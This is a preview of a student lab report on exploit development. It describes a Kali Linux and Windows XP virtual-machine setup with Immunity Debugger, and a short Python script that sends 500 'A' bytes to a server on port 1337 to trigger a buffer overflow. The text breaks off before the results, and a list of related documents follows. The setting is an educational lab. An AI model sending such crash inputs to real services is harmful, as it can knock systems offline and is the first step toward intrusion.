Workshop - Exploit Development

   

Added on  2023-06-05

5 Pages934 Words342 Views
Running head: WORKSHOP – EXPLOIT DEVELOPMENT
Workshop – Exploit Development
Name of the Student
Name of the University
Author’s Note
Workshop - Exploit Development_1
1
WORKSHOP – EXPLOIT DEVELOPMENT
For the preparation of the workshop two virtual machine is setup in VmWare i.e. Kali Linux and
Windows XP and for both the machines the network configuration is set to NAT. The configuration
NAT enables the private IP to be connected with the internet and enable communication. The IP
address are checked for enabling communication between the machines and on the windows machine
the immunity debugger is opened for running the python script and loading the server.exe and
executed.
Then in the next step the kali linux is used for creating a file using the vi editor and is named as
attack.py. The code given in the workshop is inserted in the file that is given below:
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# Testing
buffer = "\x41"*500
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
The command “python attack.py 192.168.0.57 1337” is executed for proceeding with the attack. The
IP address used is the IP address of the windows host. In the windows machine the keys shift + F9 is
pressed for passing the exception and execution of the code. A sample result is found that is given in
Workshop - Exploit Development_2

End of preview

Want to access all the pages? Upload your documents or become a member.

Related Documents
Exploit Development: Phases and Process
|5
|533
|348

ICT Ethical Hacking
|7
|878
|166

ICT Ethical Hacking: Exploit Development Process
|6
|686
|493

Exploit Development in Ethical Hacking and Defence
|6
|1003
|290

Kali Linux Exploit using Metasploit for Ethical Hacking
|4
|1061
|293

Kali Linux Exploit using Metasploit
|4
|860
|293